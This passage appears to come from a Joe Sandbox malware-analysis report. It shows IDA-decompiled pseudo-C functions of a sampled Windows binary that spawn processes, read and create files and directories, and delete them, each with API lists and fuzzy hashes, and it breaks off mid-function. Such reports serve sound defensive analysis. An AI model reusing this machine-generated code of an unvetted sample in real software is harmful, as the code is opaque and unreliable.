                          				} else {
                          					_t100 = _t103 + 8;
                          					_t100->cb = 0x44;
                          					GetStartupInfoW(_t100);
                          					if( *((intOrPtr*)(_t103 + 0x580)) == 0) {
                          						L23:
                          						_t58 = CreateProcessW( *(_t103 + 0x4c - 0x4c), 0, 0, 0, 0, 0, 0, 0, _t100, _t103 + 0x4c);
                          						_t59 =  *0x5d9b0c; // 0x26f2b8
                          						if(_t58 == 0) {
                          							 *((intOrPtr*)(_t59 + 8)) = 7;
                          						} else {
                          							 *((intOrPtr*)(_t59 + 8)) = 1;
                          							 *((intOrPtr*)(_t103 + 4)) = 1;
                          						}
                          						goto L26;
                          					}
                          					_t87 =  *0x5d9ac0; // 0x27a398
                          					_t98 = _t103 + 0x6c;
                          					_t60 = _t98;
                          					 *(_t98 - 4) = _t98;
                          					 *((intOrPtr*)(_t98 - 8)) = _t87;
                          					if(_t87 == 0) {
                          						L9:
                          						_t88 =  *0x5d9bac; // 0x0
                          						 *_t60 = 0x2c;
                          						_t61 =  &(_t60[1]);
                          						 *(_t103 + 0x68) = _t61;
                          						 *((intOrPtr*)(_t103 + 0x64)) = _t88;
                          						if(_t88 == 0) {
                          							L15:
                          							 *_t61 = 0x2c;
                          							 *(_t103 + 0x68) =  &(_t61[1]);
                          							E005C9D40( &(_t61[1]));
                          							_t64 = E005CB7A0( *0x5d9b84);
                          							_t104 = _t103 + 4;
                          							 *((intOrPtr*)(_t104 + 0x64)) = _t64;
                          							if(_t64 == 0) {
                          								L22:
                          								_t78 = _t104 + 0x46c;
                          								 *((short*)( *((intOrPtr*)(_t78 - 0x404)))) = 0;
                          								E005D4520(_t78, 0x59);
                          								_t103 = _t104 + 8;
                          								SetEnvironmentVariableW(_t78, _t98);
                          								goto L23;
                          							}
                          							_t89 = 0xfffffffe;
                          							_t93 = 0;
                          							while( *((short*)(_t64 + _t93 * 2)) != 0) {
                          								_t93 = _t93 + 1;
                          								_t89 = _t89 + 0xfffffffe;
                          								if(_t93 != 0x20) {
                          									continue;
                          								}
                          								 *(_t104 + 0x60) = 0;
                          								 *(_t104 + 0x5c) = 0x80070057;
                          								L21:
                          								E005C91E0(_t64);
                          								_t104 = _t104 + 4;
                          								goto L22;
                          							}
                          							 *(_t104 + 0x60) = _t93;
                          							 *(_t104 + 0x5c) = 0;
                          							E005CC400( *((intOrPtr*)(_t104 + 0x70)), _t64,  ~_t89);
                          							_t104 = _t104 + 0xc;
                          							_t64 =  *((intOrPtr*)(_t104 + 0x64));
                          							_t35 = _t104 + 0x68;
                          							 *_t35 =  *(_t104 + 0x68) +  *(_t104 + 0x60) +  *(_t104 + 0x60);
                          							__eflags =  *_t35;
                          							goto L21;
                          						}
                          						_t94 = 0xfffffffe;
                          						_t79 = 0;
                          						while( *((short*)(_t88 + _t79 * 2)) != 0) {
                          							_t79 = _t79 + 1;
                          							_t94 = _t94 + 0xfffffffe;
                          							if(_t79 != 0x80) {
                          								continue;
                          							}
                          							 *(_t103 + 0x60) = 0;
                          							 *(_t103 + 0x5c) = 0x80070057;
                          							goto L15;
                          						}
                          						 *(_t103 + 0x60) = _t79;
                          						 *(_t103 + 0x5c) = 0;
                          						E005CC400(_t61, _t88,  ~_t94);
                          						_t103 = _t103 + 0xc;
                          						_t61 =  *(_t103 + 0x60) +  *(_t103 + 0x60) +  *(_t103 + 0x68);
                          						__eflags = _t61;
                          						 *(_t103 + 0x68) = _t61;
                          						goto L15;
                          					}
                          					_t73 = 0;
                          					_t101 = 0;
                          					while( *((short*)(_t87 + _t73 * 2)) != 0) {
                          						_t73 = _t73 + 1;
                          						_t101 = _t101 + 0xfffffffe;
                          						if(_t73 != 0x80) {
                          							continue;
                          						}
                          						 *(_t103 + 0x60) = 0;
                          						 *(_t103 + 0x5c) = 0x80070057;
                          						_t60 = _t98;
                          						goto L9;
                          					}
                          					 *(_t103 + 0x60) = _t73;
                          					 *(_t103 + 0x5c) = 0;
                          					E005CC400(_t98, _t87, 2 - _t101);
                          					_t103 = _t103 + 0xc;
                          					_t81 = _t77 - _t101 + 0x6c;
                          					__eflags = _t81;
                          					_t60 = _t81;
                          					 *(_t103 + 0x68) = _t81;
                          					goto L9;
                          				}
                          			}

                          APIs
                          • GetStartupInfoW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 005C4430
                          • SetEnvironmentVariableW.KERNEL32(?,?,?,?,00000000), ref: 005C45B6
                          • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 005C45CE
                          • CloseHandle.KERNEL32(?), ref: 005C45F9
                          • CloseHandle.KERNEL32(?), ref: 005C4608
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                          • Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
                          • Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
                          • Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: CloseHandle$CreateEnvironmentInfoProcessStartupVariable
                          • String ID: W
                          • API String ID: 2864332936-655174618
                          • Opcode ID: 1d264710c88744b1e1ca29a59208a179dd7111bf74e171c2f54bff24f9596660
                          • Instruction ID: 8cee77c26ead2854129d8085ad5be84a4a371fa8926b4e17f816032a02c21a65
                          • Opcode Fuzzy Hash: 1d264710c88744b1e1ca29a59208a179dd7111bf74e171c2f54bff24f9596660
                          • Instruction Fuzzy Hash: 435167B09083419FE7249F69DC89F2BBBE8FB81314F14892EF495873A1E775D804CA52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 89%
                          			E005D7560(intOrPtr* __ecx) {
                          				intOrPtr _t33;
                          				WCHAR** _t34;
                          				void* _t38;
                          				WCHAR** _t44;
                          				WCHAR** _t45;
                          				void* _t46;
                          				void* _t48;
                          				WCHAR** _t54;
                          				WCHAR** _t62;
                          				WCHAR* _t64;
                          				WCHAR** _t69;
                          				WCHAR** _t72;
                          				intOrPtr* _t73;
                          				signed int _t94;
                          				WCHAR** _t97;
                          				void* _t98;
                          				WCHAR** _t99;
                          				intOrPtr* _t100;
                          				void* _t103;
                          				intOrPtr _t104;
                          				void* _t105;
                          				WCHAR*** _t106;
                          
                          				_t100 = __ecx;
                          				_push( *((intOrPtr*)( *((intOrPtr*)(_t105 + 0x34)))));
                          				_t33 = E005CC720();
                          				 *((intOrPtr*)(_t105 + 0xc)) = _t33;
                          				if(_t33 == 0) {
                          					return _t33;
                          				}
                          				_t34 = E005C5140(0x10);
                          				_t106 = _t105 + 4;
                          				_t72 = _t34;
                          				E005C91B0(_t34, 8);
                          				_t94 = 0;
                          				_t106[6] = 0;
                          				 *0x5d9d54(0x5d9bbc);
                          				if( *_t100 == 0) {
                          					L7:
                          					 *0x5d9d9c(0x5d9bbc);
                          					_t38 = E005CC430(_t72);
                          					_t102 = _t106[0xc];
                          					if(_t38 >= E005CC430(_t106[0xc]) || E005CC430(_t102) == 0) {
                          						L29:
                          						E005C91E0(_t106[3]);
                          						E005C1EA0(_t72);
                          						return L005D7400(_t72);
                          					} else {
                          						_t44 = 0;
                          						_t106[2] = _t72;
                          						do {
                          							_t106[4] = _t44;
                          							_t45 = E005C42F0(_t102, _t44);
                          							 *_t106 = _t45;
                          							if(_t45 != 0 &&  *( *_t106) != 0) {
                          								_t48 = E005CC430(_t72);
                          								_t98 = 0;
                          								if(_t48 == 0) {
                          									L17:
                          									if(_t98 != E005CC430(_t72)) {
                          										goto L28;
                          									}
                          									if(E005CC430( *((intOrPtr*)(_t100 + 0x14))) == 0) {
                          										L27:
                          										E005C9260(_t100, _t133, _t106[1], _t106[0xd]);
                          										Sleep(0x1388);
                          										goto L28;
                          									}
                          									_t103 = 0;
                          									_t106[1] = 1;
                          									do {
                          										_t54 = E005C42F0( *((intOrPtr*)(_t100 + 0x14)), _t103);
                          										if(_t54 != 0) {
                          											_t99 = _t54;
                          											_t73 = _t100;
                          											if(lstrcmpiW( *_t99,  *(_t106[0xd])) == 0 && lstrcmpiW(_t99[1],  *( *_t106)) == 0) {
                          												E005D4E70();
                          												_t89 =  <  ? 0 : _t106[1];
                          												_t106[1] =  <  ? 0 : _t106[1];
                          											}
                          											_t100 = _t73;
                          											_t72 = _t106[2];
                          										}
                          										_t103 = _t103 + 1;
                          									} while (_t103 < E005CC430( *((intOrPtr*)(_t100 + 0x14))));
                          									_t133 = _t106[1];
                          									_t102 = _t106[0xc];
                          									if(_t106[1] == 0) {
                          										goto L28;
                          									}
                          									goto L27;
                          								} else {
                          									goto L13;
                          								}
                          								do {
                          									L13:
                          									_t62 = E005C42F0(_t72, _t98);
                          									if(_t62 == 0) {
                          										goto L16;
                          									}
                          									_t64 =  *_t62;
                          									if(_t64 != 0 && lstrcmpiW( *(_t106[1]), _t64) == 0) {
                          										goto L17;
                          									}
                          									L16:
                          									_t98 = _t98 + 1;
                          								} while (_t98 < E005CC430(_t72));
                          								goto L17;
                          							}
                          							L28:
                          							_t97 =  &(_t106[4][0]);
                          							_t46 = E005CC430(_t102);
                          							_t44 = _t97;
                          						} while (_t97 < _t46);
                          						goto L29;
                          					}
                          				} else {
                          					goto L2;
                          				}
                          				do {
                          					L2:
                          					_t104 =  *((intOrPtr*)( *((intOrPtr*)(_t100 + 4)) + _t94 * 4));
                          					if(_t104 != 0 && lstrcmpiW( *(_t104 + 8), _t106[3]) == 0) {
                          						_t69 =  *(_t104 + 0x1c);
                          						if(_t69 != 0) {
                          							_t106[5] = _t69;
                          							E005C1200(_t72,  &(_t106[5]));
                          						}
                          					}
                          					_t94 = _t94 + 1;
                          				} while (_t94 <  *_t100);
                          				goto L7;
                          			}

                          APIs
                          • RtlEnterCriticalSection.NTDLL(005D9BBC), ref: 005D75A0
                          • lstrcmpiW.KERNEL32(00000000,?), ref: 005D75BB
                          • RtlLeaveCriticalSection.NTDLL(005D9BBC), ref: 005D75E6
                          • lstrcmpiW.KERNEL32(?,?,00000000,00000000), ref: 005D7666
                          • lstrcmpiW.KERNEL32(00000000,?,00000000,00000000), ref: 005D76BF
                          • lstrcmpiW.KERNEL32(?,00000000), ref: 005D76CD
                          • Sleep.KERNEL32(00001388,?,?,00000000), ref: 005D7722
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                          • Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
                          • Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
                          • Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: lstrcmpi$CriticalSection$EnterLeaveSleep
                          • String ID:
                          • API String ID: 1272173129-0
                          • Opcode ID: fe7e87c527321044af5fe48a4c54353cfb5499e0489d2025018ea554b241ac90
                          • Instruction ID: 3696f10526afef8245802316fd217a9c2e9acca9b2f62a57fd1839fb73b586a3
                          • Opcode Fuzzy Hash: fe7e87c527321044af5fe48a4c54353cfb5499e0489d2025018ea554b241ac90
                          • Instruction Fuzzy Hash: 2E5130742086069FDB24AF69D855A2EBEE5BBC8781F44442FF84987351FB30DC05CB52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 89%
                          			E005D5020(void* __ecx, void* __eflags) {
                          				void* _t91;
                          				void* _t92;
                          				void* _t94;
                          				void* _t98;
                          				intOrPtr _t102;
                          				struct _SECURITY_ATTRIBUTES* _t103;
                          				WCHAR* _t113;
                          				void* _t124;
                          				intOrPtr _t125;
                          				void* _t127;
                          				LPWSTR* _t129;
                          				signed int _t131;
                          				signed int _t132;
                          				void* _t135;
                          				intOrPtr _t143;
                          				intOrPtr _t151;
                          				void* _t153;
                          				WCHAR* _t157;
                          				void* _t158;
                          				WCHAR* _t159;
                          				void* _t160;
                          				signed int _t162;
                          				intOrPtr* _t163;
                          				intOrPtr* _t164;
                          				void* _t165;
                          				void* _t166;
                          				void* _t167;
                          				void* _t168;
                          				void* _t169;
                          
                          				_t129 = 0;
                          				_t153 = __ecx;
                          				 *((intOrPtr*)(_t163 + 8)) = 0;
                          				 *_t163 = 0;
                          				 *((intOrPtr*)(_t163 + 0x10)) = 0;
                          				 *((intOrPtr*)(_t163 + 4)) = 0;
                          				E005D30C0(_t163 + 0x1c);
                          				_t159 = _t163 + 0x22;
                          				E005D4520(_t159, 0x50);
                          				_t164 = _t163 + 8;
                          				_t155 = _t164 + 0x4fe;
                          				if(GetFullPathNameW(_t159, 0x105, _t164 + 0x4fe, 0) == 0) {
                          					L29:
                          					_t78 =  *((intOrPtr*)(_t164 + 8));
                          					if( *((intOrPtr*)(_t164 + 8)) != 0) {
                          						_t78 = E005C91E0(_t78);
                          						_t164 = _t164 + 4;
                          					}
                          					E005D03D0(_t78);
                          					return _t129;
                          				}
                          				E005D4520(_t159, 0x51);
                          				_t165 = _t164 + 8;
                          				_push( *((intOrPtr*)(_t153 + 8)));
                          				E005D68E0(_t165 + 0xea, 0x105, _t159, _t155);
                          				_t164 = _t165 + 0x14;
                          				_t129 = 1;
                          				if( *((intOrPtr*)(_t153 + 0x24)) > 0) {
                          					_t131 = 0;
                          					do {
                          						 *(_t164 + 0xc) = 0;
                          						_t160 = _t153;
                          						E005D4520(_t164 + 0x26, 0x23);
                          						_t166 = _t164 + 8;
                          						 *(_t166 + 0x18) = _t131;
                          						_t132 = _t131 << 4;
                          						_push( *((intOrPtr*)( *((intOrPtr*)(_t160 + 0x2c)) + _t132 + 4)));
                          						_t153 = _t160;
                          						E005D68E0(_t166 + 0x304, 0x105, _t164 + 0x26, _t166 + 0xee);
                          						_t167 = _t166 + 0x14;
                          						_t91 = E005D0230(_t166 + 0x304, 0, 0, _t167 + 0xc);
                          						_t164 = _t167 + 0x10;
                          						if(_t91 == 0) {
                          							 *(_t164 + 0xc) = 0;
                          						}
                          						_t92 = E005D4E70();
                          						_t162 = _t132;
                          						if(_t92 -  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x2c)) + _t132 + 0xc)) <=  *( *((intOrPtr*)(_t153 + 0x2c)) + _t132 + 8) * 0x3c || E005D4E70() -  *(_t164 + 0xc) <=  *( *((intOrPtr*)(_t153 + 0x2c)) + _t162 + 8) * 0x3c) {
                          							_t94 = _t164 + 4;
                          							if( *((intOrPtr*)(_t164 + 0x71c)) != 0) {
                          								E005D7BE0(_t164 + 0x2fc, _t164 + 0x2fc, _t164 + 4, _t94);
                          								_t169 = _t164 + 0xc;
                          								E005D7C90( *((intOrPtr*)(_t169 + 4)),  *((intOrPtr*)(_t169 + 4)));
                          								_t164 = _t169 + 8;
                          							}
                          							goto L15;
                          						} else {
                          							_t124 = E005C97E0( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x48)) + 8)));
                          							_t135 = _t164 + 4;
                          							if(_t124 == 0) {
                          								L15:
                          								_t95 =  *_t164;
                          								if( *_t164 != 0) {
                          									_t98 = E005D6F80(_t95,  *(_t164 + 0xc), _t164 + 0xc, _t164 + 0x10);
                          									_t164 = _t164 + 0x10;
                          									if(_t98 != 0) {
                          										if( *0x5d9c04 == 0) {
                          											if(GetFileAttributesW(_t164 + 0xea) == 0xffffffff) {
                          												_t113 = _t164 + 0xea;
                          												_t157 = _t113;
                          												PathRemoveBackslashW(_t113);
                          												CreateDirectoryW(_t157, 0);
                          												PathAddBackslashW(_t157);
                          											}
                          											E005D7C90( *((intOrPtr*)(_t164 + 4)),  *((intOrPtr*)(_t164 + 4)));
                          											_t168 = _t164 + 8;
                          											E005C6270(_t168 + 0x2fc, _t168 + 0x2fc,  *((intOrPtr*)(_t168 + 4)),  *((intOrPtr*)(_t168 + 4)));
                          											_t164 = _t168 + 0xc;
                          										}
                          										_t102 = E005D4E70();
                          										_t143 =  *((intOrPtr*)(_t153 + 0x2c));
                          										 *((intOrPtr*)(_t143 + _t162 + 0xc)) = _t102;
                          										_t103 =  *(_t164 + 0x10);
                          										_t151 =  *((intOrPtr*)(_t164 + 8));
                          										_t164 = _t164 - 0x10;
                          										 *((intOrPtr*)(_t164 + 4)) =  *((intOrPtr*)(_t143 + _t162));
                          										 *(_t164 + 0xc) = _t103;
                          										 *((intOrPtr*)(_t164 + 8)) = _t151;
                          										E005CE0F0(_t153);
                          										_t105 =  *((intOrPtr*)(_t164 + 8));
                          										if( *((intOrPtr*)(_t164 + 8)) != 0) {
                          											E005C91E0(_t105);
                          											_t164 = _t164 + 4;
                          											 *((intOrPtr*)(_t164 + 8)) = 0;
                          											 *(_t164 + 0x10) = 0;
                          										}
                          									}
                          									_t99 =  *_t164;
                          									if( *_t164 != 0) {
                          										E005C91E0(_t99);
                          										_t164 = _t164 + 4;
                          										 *_t164 = 0;
                          										 *((intOrPtr*)(_t164 + 4)) = 0;
                          									}
                          								}
                          								goto L25;
                          							}
                          							_t125 =  *((intOrPtr*)(_t153 + 0x48));
                          							E005D5C00( *((intOrPtr*)(_t125 + 8)));
                          							if(_t125 == 0) {
                          								goto L25;
                          							} else {
                          								_t158 = 0;
                          								 *((intOrPtr*)(_t164 + 0x14)) = _t125;
                          								while(1) {
                          									_push(_t135);
                          									_push(_t164 + 4);
                          									_t127 = E005D4610( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x48)) + 8)), 5,  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x2c)) + _t162 + 4)));
                          									_t164 = _t164 + 0x14;
                          									if(_t127 != 0) {
                          										break;
                          									}
                          									Sleep(0xbb8);
                          									_t158 = _t158 + 1;
                          									if(_t158 < 2) {
                          										continue;
                          									}
                          									break;
                          								}
                          								E005C91E0( *((intOrPtr*)(_t164 + 0x14)));
                          								_t164 = _t164 + 4;
                          								goto L15;
                          							}
                          						}
                          						L25:
                          						_t131 =  *((intOrPtr*)(_t164 + 0x18)) + 1;
                          					} while (_t131 <  *((intOrPtr*)(_t153 + 0x24)));
                          					_t96 =  *_t164;
                          					if( *_t164 != 0) {
                          						E005C91E0(_t96);
                          						_t164 = _t164 + 4;
                          					}
                          					_t129 = 1;
                          				}
                          			}

                          APIs
                          • GetFullPathNameW.KERNEL32(?,00000105,?,00000000), ref: 005D5064
                            • Part of subcall function 005D68E0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00000400), ref: 005D6A15
                            • Part of subcall function 005D0230: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005D0248
                            • Part of subcall function 005D0230: GetFileTime.KERNEL32(00000000,?,?,?,?,?,005D0385,00000000), ref: 005D0267
                            • Part of subcall function 005D0230: _aulldiv.NTDLL(?,?,00989680,00000000), ref: 005D028C
                            • Part of subcall function 005D0230: _aulldiv.NTDLL(?,?,00989680,00000000), ref: 005D02B0
                            • Part of subcall function 005D0230: _aulldiv.NTDLL(?,?,00989680,00000000), ref: 005D02D3
                            • Part of subcall function 005D0230: CloseHandle.KERNEL32(00000000), ref: 005D02E5
                          • Sleep.KERNEL32(00000BB8), ref: 005D5191
                          • GetFileAttributesW.KERNEL32(?), ref: 005D521A
                          • PathRemoveBackslashW.SHLWAPI(?), ref: 005D522F
                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 005D5238
                          • PathAddBackslashW.SHLWAPI(?), ref: 005D523F
                            • Part of subcall function 005D7BE0: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 005D7C03
                            • Part of subcall function 005D7BE0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?), ref: 005D7C1D
                            • Part of subcall function 005D7BE0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 005D7C28
                            • Part of subcall function 005D7BE0: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 005D7C4A
                            • Part of subcall function 005D7BE0: CloseHandle.KERNEL32(00000000), ref: 005D7C6D
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
• Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
• Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: File$CreatePath_aulldiv$BackslashCloseHandlePointer$AttributesByteCharDirectoryFullMultiNameReadRemoveSleepTimeWide
                          • String ID:
                          • API String ID: 2481069558-0
                          • Opcode ID: 898f9c1539e55fbf8873735831ab9f8461fd0a9ac28df3ea61c77c67b3c90b6d
                          • Instruction ID: bda982c0fe9740e6544596f1cb5013bc5b82ef0d03c8a2299b53d5a8cd2e092c
                          • Opcode Fuzzy Hash: 898f9c1539e55fbf8873735831ab9f8461fd0a9ac28df3ea61c77c67b3c90b6d
                          • Instruction Fuzzy Hash: 7F817175904706AFC720EF68D889A5BBBE8BF94304F04482FF989C6252F731E904CB52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 83%
                          			E005CD6B0(signed int* __ecx) {
                          				signed int _t38;
                          				signed int _t41;
                          				signed int _t43;
                          				signed int _t47;
                          				WCHAR* _t48;
                          				signed int _t53;
                          				signed int _t71;
                          				signed int _t72;
                          				signed int _t74;
                          				signed int _t75;
                          				signed int _t78;
                          				signed int _t80;
                          				signed int _t82;
                          				signed int* _t83;
                          				signed int* _t84;
                          				signed int _t85;
                          				signed int _t88;
                          				WCHAR* _t89;
                          				void* _t91;
                          				signed int* _t92;
                          				signed int _t93;
                          				signed int** _t94;
                          				signed int** _t97;
                          				signed int** _t98;
                          				signed int** _t99;
                          
                          				_t92 = _t94[0x1c3];
                          				_t84 = __ecx;
                          				if(_t92 != 0) {
                          					 *0x5d9d54(0x5d9bbc);
                          				}
                          				_t38 =  *_t84;
                          				if(_t38 == 0) {
                          					L6:
                          					_t85 = 0;
                          				} else {
                          					_t74 = _t94[0x1c4];
                          					_t82 = _t94[0x1c2];
                          					_t80 = _t84[1];
                          					_t71 = 0;
                          					 *_t94 = _t84;
                          					while( *((intOrPtr*)(_t80 + _t71 * 4)) != _t82) {
                          						_t71 = _t71 + 1;
                          						if(_t71 < _t38) {
                          							continue;
                          						} else {
                          							goto L6;
                          						}
                          						goto L28;
                          					}
                          					__eflags = _t74;
                          					if(_t74 == 0) {
                          						L18:
                          						__eflags = _t82;
                          						if(_t82 != 0) {
                          							goto L19;
                          						}
                          					} else {
                          						_t78 =  *0x5d9c04; // 0x0
                          						__eflags = _t78;
                          						if(_t78 != 0) {
                          							goto L18;
                          						} else {
                          							_push( *((intOrPtr*)(_t82 + 8)));
                          							_t47 = E005CC720();
                          							__eflags = _t47;
                          							if(__eflags != 0) {
                          								_t88 = _t47;
                          								_t48 = E005D0520(__eflags, _t47);
                          								__eflags = _t48;
                          								if(_t48 != 0) {
                          									_t94[2] = _t88;
                          									_t94[1] = _t48;
                          									DeleteFileW(_t48);
                          									_t89 =  &(_t94[3]);
                          									E005D4520(_t89, 0x50);
                          									_t97 =  &(_t94[2]);
                          									_t53 = GetFullPathNameW(_t89, 0x105,  &(_t97[0x13a]), 0);
                          									__eflags = _t53;
                          									if(_t53 != 0) {
                          										E005D4520( &(_t97[4]), 0x51);
                          										_t98 =  &(_t97[2]);
                          										_push( *((intOrPtr*)(_t82 + 8)));
                          										E005D68E0( &(_t98[0x35]), 0x105,  &(_t97[4]),  &(_t98[0x13b]));
                          										_t97 =  &(_t98[5]);
                          										__eflags =  *(_t82 + 0x24);
                          										if( *(_t82 + 0x24) > 0) {
                          											_t93 = 0;
                          											__eflags = 0;
                          											_t91 = 4;
                          											do {
                          												E005D4520( &(_t97[4]), 0x23);
                          												_t99 =  &(_t97[2]);
                          												_push( *((intOrPtr*)( *((intOrPtr*)(_t82 + 0x2c)) + _t91)));
                          												E005D68E0( &(_t99[0xbc]), 0x105,  &(_t99[5]),  &(_t99[0x36]));
                          												_t97 =  &(_t99[5]);
                          												DeleteFileW( &(_t97[0xb8]));
                          												_t93 = _t93 + 1;
                          												_t91 = _t91 + 0x10;
                          												__eflags = _t93 -  *(_t82 + 0x24);
                          											} while (_t93 <  *(_t82 + 0x24));
                          										}
                          										RemoveDirectoryW( &(_t97[0x35]));
                          										_t92 = _t97[0x1c3];
                          									}
                          									E005C91E0(_t97[1]);
                          									_t94 =  &(_t97[1]);
                          									_t88 = _t94[2];
                          								}
                          								E005C91E0(_t88);
                          								_t94 =  &(_t94[1]);
                          							}
                          							L19:
                          							E005CB860(_t82);
                          							L005D7400(_t82);
                          							_t94 =  &(_t94[1]);
                          							_t38 =  *( *_t94);
                          						}
                          					}
                          					_t83 =  *_t94;
                          					_t75 = _t38 - 1;
                          					__eflags = _t71 - _t75;
                          					 *_t83 = _t75;
                          					if(_t71 < _t75) {
                          						_t72 = _t71 + 1;
                          						__eflags = _t72;
                          						do {
                          							 *((intOrPtr*)(_t83[1] + _t72 * 4 - 4)) =  *((intOrPtr*)(_t83[1] + _t72 * 4));
                          							_t72 = _t72 + 1;
                          							__eflags = _t38 - _t72;
                          						} while (_t38 != _t72);
                          					}
                          					_t41 = _t83[1];
                          					__eflags = _t75;
                          					if(_t75 == 0) {
                          						E005C91E0(_t41);
                          						_t43 = 0;
                          						__eflags = 0;
                          						goto L27;
                          					} else {
                          						_t43 = E005C3180(_t75 << 2, _t41);
                          						__eflags = _t43;
                          						if(_t43 != 0) {
                          							L27:
                          							_t83[1] = _t43;
                          							_t85 = 1;
                          							__eflags = 1;
                          						} else {
                          							goto L6;
                          						}
                          					}
                          				}
                          				L28:
                          				if(_t92 != 0) {
                          					 *0x5d9d9c(0x5d9bbc);
                          				}
                          				return _t85;
                          			}

                          APIs
                          • RtlEnterCriticalSection.NTDLL(005D9BBC), ref: 005CD6CC
                          • DeleteFileW.KERNEL32(00000000,00000000,?), ref: 005CD73E
                          • GetFullPathNameW.KERNEL32(?,00000105,?,00000000), ref: 005CD763
                          • DeleteFileW.KERNEL32(?), ref: 005CD7EF
                          • RemoveDirectoryW.KERNEL32(?), ref: 005CD806
                          • RtlLeaveCriticalSection.NTDLL(005D9BBC), ref: 005CD89A
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
• Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
• Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: CriticalDeleteFileSection$DirectoryEnterFullLeaveNamePathRemove
                          • String ID:
                          • API String ID: 328185309-0
                          • Opcode ID: 60c6970e1fa16f380628a09a96f2bb163b5e32265d88ab89b52fd0323a7b3574
                          • Instruction ID: c50f59534ed9d263c7a05284b2f034168fbcb8406cabe84c68319a966cf054f5
                          • Opcode Fuzzy Hash: 60c6970e1fa16f380628a09a96f2bb163b5e32265d88ab89b52fd0323a7b3574
                          • Instruction Fuzzy Hash: 5951A3B5904206AFD730ABA4DC49F6BBBA8FF84704F04053EE949D3241E771E915CBA2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 94%
                          			E005D7410(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                          				short _v1040;
                          				struct _OVERLAPPED* _v1044;
                          				intOrPtr _t25;
                          				void* _t27;
                          				long _t29;
                          				void* _t34;
                          				long _t41;
                          				intOrPtr _t42;
                          				short* _t43;
                          				void* _t44;
                          				void* _t45;
                          				signed int _t46;
                          				signed int _t47;
                          				void* _t49;
                          				signed int _t50;
                          				signed int _t51;
                          				void* _t52;
                          				intOrPtr _t53;
                          				void* _t54;
                          				DWORD* _t55;
                          
                          				_t53 = _a12;
                          				_t25 = _a8;
                          				_t42 = _a4;
                          				_t44 = 0xfffffc00;
                          				_v1044 = 0;
                          				while(1) {
                          					_t50 =  *(_t42 + _t44 + 0x400) & 0x0000ffff;
                          					if(_t50 == 0) {
                          						break;
                          					}
                          					 *(_t54 + _t44 + 0x404) = _t50;
                          					_t44 = _t44 + 2;
                          					if(_t44 != 0) {
                          						continue;
                          					} else {
                          						 *((short*)(_t54 + _t44 + 0x402)) = 0;
                          					}
                          					L20:
                          					return 0;
                          				}
                          				 *(_t54 + _t44 + 0x404) = 0;
                          				_t43 =  &_v1040;
                          				_t45 = 0x200;
                          				while( *_t43 != 0) {
                          					_t43 = _t43 + 2;
                          					_t45 = _t45 - 1;
                          					if(_t45 != 0) {
                          						continue;
                          					} else {
                          					}
                          					goto L20;
                          				}
                          				_t46 = 0;
                          				while(1) {
                          					_t51 = _t46;
                          					_t47 =  *(_t25 + _t46 * 2) & 0x0000ffff;
                          					if(_t47 == 0) {
                          						break;
                          					}
                          					 *(_t43 + _t51 * 2) = _t47;
                          					_t17 = _t51 + 1; // 0x1
                          					_t46 = _t17;
                          					if(_t45 != _t46) {
                          						continue;
                          					} else {
                          						 *(_t43 + _t51 * 2) = 0;
                          					}
                          					goto L20;
                          				}
                          				 *(_t43 + _t51 * 2) = 0;
                          				_t27 = CreateFileW( &_v1040, 0x80000000, 1, 0, 3, 0x80, 0);
                          				if(_t27 != 0xffffffff) {
                          					_t52 = _t27;
                          					_t29 = SetFilePointer(_t27, 0, 0, 2);
                          					if(_t29 == 0xffffffff) {
                          						L19:
                          						CloseHandle(_t52);
                          					} else {
                          						_t41 = _t29;
